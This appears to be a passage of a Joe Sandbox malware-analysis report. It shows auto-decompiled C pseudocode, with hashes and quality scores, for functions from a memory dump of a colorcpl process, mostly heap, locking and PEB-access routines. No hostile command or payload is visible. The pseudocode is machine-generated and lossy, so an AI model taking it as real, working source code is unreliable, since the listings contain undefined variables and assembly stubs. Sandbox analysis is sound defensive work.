                                                                                                						_t28 =  *0x6f07b14; // 0x771a7b0c
                                                                                                						__eflags = _t28 - 0x6f07b0c;
                                                                                                						if(_t28 != 0x6f07b0c) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                                						}
                                                                                                						_t9 = _t52 + 8; // 0x20
                                                                                                						 *0x6f07b14 = _t50;
                                                                                                						_t48 = _v12;
                                                                                                						 *0x6f07b10 = _t9;
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					 *0x6f07b10 = _t37 + 8;
                                                                                                					goto L6;
                                                                                                				}
                                                                                                				 *__ecx = _t17;
                                                                                                				 *_t33 = 0;
                                                                                                				goto L3;
                                                                                                			}

















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3161dd1fb942b0e81e1a0ad94db6fc9fa091280f9abf4e6aa89d1ef72b0c0fdd
                                                                                                • Instruction ID: 728c3fa19a70d9b4f30917b435646496a427e1391cc2e674315ff9620ce152a4
                                                                                                • Opcode Fuzzy Hash: 3161dd1fb942b0e81e1a0ad94db6fc9fa091280f9abf4e6aa89d1ef72b0c0fdd
                                                                                                • Instruction Fuzzy Hash: F131C2F16043489FE7A1FB18EC84F6577FAFB84728F5409A9E21587288D370B945CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E06E1AA16(signed short* __ecx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				signed short _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed short _v24;
                                                                                                				signed short _v28;
                                                                                                				void* _v32;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t25;
                                                                                                				signed short _t38;
                                                                                                				signed short* _t42;
                                                                                                				signed int _t44;
                                                                                                				signed short* _t52;
                                                                                                				signed short _t53;
                                                                                                				signed int _t54;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t54;
                                                                                                				_t42 = __ecx;
                                                                                                				_t44 =  *__ecx & 0x0000ffff;
                                                                                                				_t52 =  &(__ecx[2]);
                                                                                                				_t51 = _t44 + 2;
                                                                                                				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                                                					L4:
                                                                                                					_t25 =  *0x6f07b9c; // 0x0
                                                                                                					_t53 = L06E34620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                                                					__eflags = _t53;
                                                                                                					if(_t53 == 0) {
                                                                                                						L3:
                                                                                                						return E06E5B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                                                					} else {
                                                                                                						E06E5F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                                                						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                						L2:
                                                                                                						_t51 = 4;
                                                                                                						if(L06E26C59(_t53, _t51, _t58) != 0) {
                                                                                                							_t28 = E06E45E50(0x6dfc338, 0, 0,  &_v32);
                                                                                                							__eflags = _t28;
                                                                                                							if(_t28 == 0) {
                                                                                                								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                                                								__eflags = _t38;
                                                                                                								_v24 = _t53;
                                                                                                								_v16 = _t38;
                                                                                                								_v20 = 0;
                                                                                                								_v12 = 0;
                                                                                                								E06E4B230(_v32, _v28, 0x6dfc2d8, 1,  &_v24);
                                                                                                								_t28 = E06E1F7A0(_v32, _v28);
                                                                                                							}
                                                                                                							__eflags = _t53 -  *_t52;
                                                                                                							if(_t53 !=  *_t52) {
                                                                                                								_t28 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                                							}
                                                                                                						}
                                                                                                						goto L3;
                                                                                                					}
                                                                                                				}
                                                                                                				_t53 =  *_t52;
                                                                                                				_t44 = _t44 >> 1;
                                                                                                				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                                                				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				goto L2;
                                                                                                			}





















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 229d879ceb7f90f3b96df8baff6fa0e7ebcb0db0de6e76ee2e5a77974439e658
                                                                                                • Instruction ID: b0c747d3af7963f4ef9db6dd6c59a6cc943c1471a25431d74f9a71299d05060c
                                                                                                • Opcode Fuzzy Hash: 229d879ceb7f90f3b96df8baff6fa0e7ebcb0db0de6e76ee2e5a77974439e658
                                                                                                • Instruction Fuzzy Hash: B931D171A10329EBDF90AF68CD81ABFB7B9EF04700B015069F915EB180E7749911EBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 97%
                                                                                                			E06E461A0(signed int* __ecx) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr* _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _t30;
                                                                                                				intOrPtr _t31;
                                                                                                				void* _t32;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr _t37;
                                                                                                				intOrPtr _t49;
                                                                                                				signed int _t51;
                                                                                                				intOrPtr _t52;
                                                                                                				signed int _t54;
                                                                                                				void* _t59;
                                                                                                				signed int* _t61;
                                                                                                				intOrPtr* _t64;
                                                                                                
                                                                                                				_t61 = __ecx;
                                                                                                				_v12 = 0;
                                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                				_v16 = __ecx;
                                                                                                				_v8 = 0;
                                                                                                				if(_t30 == 0) {
                                                                                                					L6:
                                                                                                					_t31 = 0;
                                                                                                					L7:
                                                                                                					return _t31;
                                                                                                				}
                                                                                                				_t32 = _t30 + 0x5d8;
                                                                                                				if(_t32 == 0) {
                                                                                                					goto L6;
                                                                                                				}
                                                                                                				_t59 = _t32 + 0x30;
                                                                                                				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                                                					goto L6;
                                                                                                				}
                                                                                                				if(__ecx != 0) {
                                                                                                					 *((intOrPtr*)(__ecx)) = 0;
                                                                                                					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                                                					_t51 =  *(_t32 + 0x10);
                                                                                                					_t33 = _t32 + 0x10;
                                                                                                					_v20 = _t33;
                                                                                                					_t54 =  *(_t33 + 4);
                                                                                                					if((_t51 | _t54) == 0) {
                                                                                                						_t37 = E06E45E50(0x6df67cc, 0, 0,  &_v12);
                                                                                                						if(_t37 != 0) {
                                                                                                							goto L6;
                                                                                                						}
                                                                                                						_t52 = _v8;
                                                                                                						asm("lock cmpxchg8b [esi]");
                                                                                                						_t64 = _v16;
                                                                                                						_t49 = _t37;
                                                                                                						_v20 = 0;
                                                                                                						if(_t37 == 0) {
                                                                                                							if(_t64 != 0) {
                                                                                                								 *_t64 = _v12;
                                                                                                								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                                                							}
                                                                                                							E06EE9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                                                							_t31 = 1;
                                                                                                							goto L7;
                                                                                                						}
                                                                                                						E06E1F7C0(_t52, _v12, _t52, 0);
                                                                                                						if(_t64 != 0) {
                                                                                                							 *_t64 = _t49;
                                                                                                							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                                                						}
                                                                                                						L12:
                                                                                                						_t31 = 1;
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					if(_t61 != 0) {
                                                                                                						 *_t61 = _t51;
                                                                                                						_t61[1] = _t54;
                                                                                                					}
                                                                                                					goto L12;
                                                                                                				} else {
                                                                                                					goto L6;
                                                                                                				}
                                                                                                			}




















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bc0604f37f3e8de3977fe770d26f7c7938b9b148b076020ce0af60fd4170f080
                                                                                                • Instruction ID: d7494cd5eb3b7d9edba0c0cff1bd732ee55c689d42a0454dd9fc07d75bb651a7
                                                                                                • Opcode Fuzzy Hash: bc0604f37f3e8de3977fe770d26f7c7938b9b148b076020ce0af60fd4170f080
                                                                                                • Instruction Fuzzy Hash: 6531AD71A293019FD7A4EF19C800B2AB7E4FB88B04F15596DE99C9B351E7B0E804CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E06E58EC7(void* __ecx, void* __edx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				char* _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				signed int* _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				intOrPtr _v56;
                                                                                                				signed int* _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				intOrPtr _v68;
                                                                                                				intOrPtr _v72;
                                                                                                				char* _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				signed int _v84;
                                                                                                				intOrPtr _v88;
                                                                                                				intOrPtr _v92;
                                                                                                				intOrPtr _v96;
                                                                                                				intOrPtr _v100;
                                                                                                				intOrPtr _v104;
                                                                                                				signed int* _v108;
                                                                                                				char _v140;
                                                                                                				signed int _v144;
                                                                                                				signed int _v148;
                                                                                                				intOrPtr _v152;
                                                                                                				char _v156;
                                                                                                				intOrPtr _v160;
                                                                                                				char _v164;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t67;
                                                                                                				intOrPtr _t70;
                                                                                                				void* _t71;
                                                                                                				void* _t72;
                                                                                                				signed int _t73;
                                                                                                
                                                                                                				_t69 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t73;
                                                                                                				_t48 =  *[fs:0x30];
                                                                                                				_t72 = __edx;
                                                                                                				_t71 = __ecx;
                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                                                                					_t48 = E06E44E70(0x6f086e4, 0x6e59490, 0, 0);
                                                                                                					if( *0x6f053e8 > 5 && E06E58F33(0x6f053e8, 0, 0x2000) != 0) {
                                                                                                						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                                                                						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                                                                						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                                                                						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                                                                						_v108 =  &_v84;
                                                                                                						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                                                                						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                                                                						_v76 =  &_v156;
                                                                                                						_t70 = 8;
                                                                                                						_v60 =  &_v144;
                                                                                                						_t67 = 4;
                                                                                                						_v44 =  &_v148;
                                                                                                						_v152 = 0;
                                                                                                						_v160 = 0;
                                                                                                						_v104 = 0;
                                                                                                						_v100 = 2;
                                                                                                						_v96 = 0;
                                                                                                						_v88 = 0;
                                                                                                						_v80 = 0;
                                                                                                						_v72 = 0;
                                                                                                						_v68 = _t70;
                                                                                                						_v64 = 0;
                                                                                                						_v56 = 0;
                                                                                                						_v52 = 0x6f053e8;
                                                                                                						_v48 = 0;
                                                                                                						_v40 = 0;
                                                                                                						_v36 = 0x6f053e8;
                                                                                                						_v32 = 0;
                                                                                                						_v28 =  &_v164;
                                                                                                						_v24 = 0;
                                                                                                						_v20 = _t70;
                                                                                                						_v16 = 0;
                                                                                                						_t69 = 0x6dfbc46;
                                                                                                						_t48 = E06E97B9C(0x6f053e8, 0x6dfbc46, _t67, 0x6f053e8, _t70,  &_v140);
                                                                                                					}
                                                                                                				}
                                                                                                				return E06E5B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 88d06d5c78a2f91c83fd5e16458f4108107c8f8dcb49377634defd58ed2eb828
                                                                                                • Instruction ID: 504e83fcaa38cb10f5dccfc51b97e93293acbcd65c54ca55047ab71d723b7d01
                                                                                                • Opcode Fuzzy Hash: 88d06d5c78a2f91c83fd5e16458f4108107c8f8dcb49377634defd58ed2eb828
                                                                                                • Instruction Fuzzy Hash: 9D41A2B1D0032C9EDB64CFAAD981AAEFBF9FB48310F5041AEE519A7240D7705A44CF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 58%
                                                                                                			E06E54A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                				signed int _v8;
                                                                                                				signed int* _v12;
                                                                                                				char _v13;
                                                                                                				signed int _v16;
                                                                                                				char _v21;
                                                                                                				signed int* _v24;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t29;
                                                                                                				signed int* _t32;
                                                                                                				signed int* _t41;
                                                                                                				signed int _t42;
                                                                                                				void* _t43;
                                                                                                				intOrPtr* _t51;
                                                                                                				void* _t52;
                                                                                                				signed int _t53;
                                                                                                				signed int _t58;
                                                                                                				void* _t59;
                                                                                                				signed int _t60;
                                                                                                				signed int _t62;
                                                                                                
                                                                                                				_t49 = __edx;
                                                                                                				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                                                				_t26 =  *0x6f0d360 ^ _t62;
                                                                                                				_v8 =  *0x6f0d360 ^ _t62;
                                                                                                				_t41 = __ecx;
                                                                                                				_t51 = __edx;
                                                                                                				_v12 = __ecx;
                                                                                                				if(_a4 == 0) {
                                                                                                					if(_a8 != 0) {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					_v13 = 1;
                                                                                                					E06E32280(_t26, 0x6f08608);
                                                                                                					_t58 =  *_t41;
                                                                                                					if(_t58 == 0) {
                                                                                                						L11:
                                                                                                						E06E2FFB0(_t41, _t51, 0x6f08608);
                                                                                                						L2:
                                                                                                						 *0x6f0b1e0(_a4, _a8);
                                                                                                						_t42 =  *_t51();
                                                                                                						if(_t42 == 0) {
                                                                                                							_t29 = 0;
                                                                                                							L5:
                                                                                                							_pop(_t52);
                                                                                                							_pop(_t59);
                                                                                                							_pop(_t43);
                                                                                                							return E06E5B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                                                						}
                                                                                                						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                                                						if(_v21 != 0) {
                                                                                                							_t53 = 0;
                                                                                                							E06E32280(_t28, 0x6f08608);
                                                                                                							_t32 = _v24;
                                                                                                							if( *_t32 == _t58) {
                                                                                                								 *_t32 = _t42;
                                                                                                								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                                                								if(_t58 != 0) {
                                                                                                									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                                                									asm("sbb edi, edi");
                                                                                                									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                                                								}
                                                                                                							}
                                                                                                							E06E2FFB0(_t42, _t53, 0x6f08608);
                                                                                                							if(_t53 != 0) {
                                                                                                								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                                							}
                                                                                                						}
                                                                                                						_t29 = _t42;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					if( *((char*)(_t58 + 0x40)) != 0) {
                                                                                                						L10:
                                                                                                						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                                                						E06E2FFB0(_t41, _t51, 0x6f08608);
                                                                                                						_t29 = _t58;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                                						goto L11;
                                                                                                					}
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				L1:
                                                                                                				_v13 = 0;
                                                                                                				_t58 = 0;
                                                                                                				goto L2;
                                                                                                			}

                                                                                                0x06e54acb
                                                                                                0x06e54a53
                                                                                                0x06e54a53
                                                                                                0x06e54a58
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0d8c20c833171f8363d01f367f33a719de1a79118e5b07ce547f05b544e27e3b
                                                                                                • Instruction ID: 7bc8bf6812a6cfc1b370fb97f983cf1880ad7fab400743563302bc408a117306
                                                                                                • Opcode Fuzzy Hash: 0d8c20c833171f8363d01f367f33a719de1a79118e5b07ce547f05b544e27e3b
                                                                                                • Instruction Fuzzy Hash: DE31EF32611350DFEBE1AE54CD44B6BB7E9FF85B14F026529E86A0B681E770D880CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E06E4E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                                                				intOrPtr* _v0;
                                                                                                				signed char _v4;
                                                                                                				signed int _v8;
                                                                                                				void* __ecx;
                                                                                                				void* __ebp;
                                                                                                				void* _t37;
                                                                                                				intOrPtr _t38;
                                                                                                				signed int _t44;
                                                                                                				signed char _t52;
                                                                                                				void* _t54;
                                                                                                				intOrPtr* _t56;
                                                                                                				void* _t58;
                                                                                                				char* _t59;
                                                                                                				signed int _t62;
                                                                                                
                                                                                                				_t58 = __edx;
                                                                                                				_push(0);
                                                                                                				_push(4);
                                                                                                				_push( &_v8);
                                                                                                				_push(0x24);
                                                                                                				_push(0xffffffff);
                                                                                                				if(E06E59670() < 0) {
                                                                                                					L06E6DF30(_t54, _t58, _t35);
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					_push(_t54);
                                                                                                					_t52 = _v4;
                                                                                                					if(_t52 > 8) {
                                                                                                						_t37 = 0xc0000078;
                                                                                                					} else {
                                                                                                						_t38 =  *0x6f07b9c; // 0x0
                                                                                                						_t62 = _t52 & 0x000000ff;
                                                                                                						_t59 = L06E34620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                                                						if(_t59 == 0) {
                                                                                                							_t37 = 0xc0000017;
                                                                                                						} else {
                                                                                                							_t56 = _v0;
                                                                                                							 *(_t59 + 1) = _t52;
                                                                                                							 *_t59 = 1;
                                                                                                							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                                                                							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                                                							_t44 = _t62 - 1;
                                                                                                							if(_t44 <= 7) {
                                                                                                								switch( *((intOrPtr*)(_t44 * 4 +  &M06E4E810))) {
                                                                                                									case 0:
                                                                                                										L6:
                                                                                                										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                                                										goto L7;
                                                                                                									case 1:
                                                                                                										L13:
                                                                                                										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                                                										goto L6;
                                                                                                									case 2:
                                                                                                										L12:
                                                                                                										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                                                										goto L13;
                                                                                                									case 3:
                                                                                                										L11:
                                                                                                										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                                                										goto L12;
                                                                                                									case 4:
                                                                                                										L10:
                                                                                                										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                                                										goto L11;
                                                                                                									case 5:
                                                                                                										L9:
                                                                                                										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                                                										goto L10;
                                                                                                									case 6:
                                                                                                										L17:
                                                                                                										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                                                										goto L9;
                                                                                                									case 7:
                                                                                                										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                                                										goto L17;
                                                                                                								}
                                                                                                							}
                                                                                                							L7:
                                                                                                							 *_a40 = _t59;
                                                                                                							_t37 = 0;
                                                                                                						}
                                                                                                					}
                                                                                                					return _t37;
                                                                                                				} else {
                                                                                                					_push(0x20);
                                                                                                					asm("ror eax, cl");
                                                                                                					return _a4 ^ _v8;
                                                                                                				}
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5eb2231f7db24727619b707fd335fcb328570372e28802b5422aad19e229c000
                                                                                                • Instruction ID: 23c93645f9c0648d96e31ec6cf129f175eea83fc1c2a236b7b2ce10bd0b68202
                                                                                                • Opcode Fuzzy Hash: 5eb2231f7db24727619b707fd335fcb328570372e28802b5422aad19e229c000
                                                                                                • Instruction Fuzzy Hash: D1318F75A14349EFD784DF28D844F9AB7E8FB08324F159256F918CB381D631E880CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E06E4BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				intOrPtr _t22;
                                                                                                				intOrPtr* _t41;
                                                                                                				intOrPtr _t51;
                                                                                                
                                                                                                				_t51 =  *0x6f06100; // 0x5f
                                                                                                				_v12 = __edx;
                                                                                                				_v8 = __ecx;
                                                                                                				if(_t51 >= 0x800) {
                                                                                                					L12:
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					goto L1;
                                                                                                				}
                                                                                                				while(1) {
                                                                                                					L1:
                                                                                                					_t22 = _t51;
                                                                                                					asm("lock cmpxchg [ecx], edx");
                                                                                                					if(_t51 == _t22) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t51 = _t22;
                                                                                                					if(_t22 < 0x800) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					goto L12;
                                                                                                				}
                                                                                                				E06E32280(0xd, 0x22b1f1a0);
                                                                                                				_t41 =  *0x6f060f8; // 0x0
                                                                                                				if(_t41 != 0) {
                                                                                                					 *0x6f060f8 =  *_t41;
                                                                                                					 *0x6f060fc =  *0x6f060fc + 0xffff;
                                                                                                				}
                                                                                                				E06E2FFB0(_t41, 0x800, 0x22b1f1a0);
                                                                                                				if(_t41 != 0) {
                                                                                                					L6:
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                                                					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                                                					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                                                					do {
                                                                                                						asm("lock xadd [0x6f060f0], ax");
                                                                                                						 *((short*)(_t41 + 0x34)) = 1;
                                                                                                					} while (1 == 0);
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t41 = L06E34620(0x6f06100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                                                					if(_t41 == 0) {
                                                                                                						L11:
                                                                                                						asm("lock dec dword [0x6f06100]");
                                                                                                						L8:
                                                                                                						return _t41;
                                                                                                					}
                                                                                                					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                                                					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                                                					if(_t41 == 0) {
                                                                                                						goto L11;
                                                                                                					}
                                                                                                					goto L6;
                                                                                                				}
                                                                                                			}











                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5bf6679cd435a7afa325e598a663c3e0b265a9da1a470189191dcbb80682c4fa
                                                                                                • Instruction ID: 8a6a469b43d6db6b6445746c0ba98130f1633294688dc4b7f7df9733ebc15d28
                                                                                                • Opcode Fuzzy Hash: 5bf6679cd435a7afa325e598a663c3e0b265a9da1a470189191dcbb80682c4fa
                                                                                                • Instruction Fuzzy Hash: CF31F136A047199FEB81EF68E8C07A673A5FB18315F1160B5DA45DB201E674D909CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 60%
                                                                                                			E06E41DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                                				char _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr* _v20;
                                                                                                				void* _t22;
                                                                                                				char _t23;
                                                                                                				void* _t36;
                                                                                                				intOrPtr _t42;
                                                                                                				intOrPtr _t43;
                                                                                                
                                                                                                				_v12 = __ecx;
                                                                                                				_t43 = 0;
                                                                                                				_v20 = __edx;
                                                                                                				_t42 =  *__edx;
                                                                                                				 *__edx = 0;
                                                                                                				_v16 = _t42;
                                                                                                				_push( &_v8);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(6);
                                                                                                				_push(0);
                                                                                                				_push(__ecx);
                                                                                                				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                                                                				_push(_t36);
                                                                                                				_t22 = E06E3F460();
                                                                                                				if(_t22 < 0) {
                                                                                                					if(_t22 == 0xc0000023) {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					L3:
                                                                                                					return _t43;
                                                                                                				}
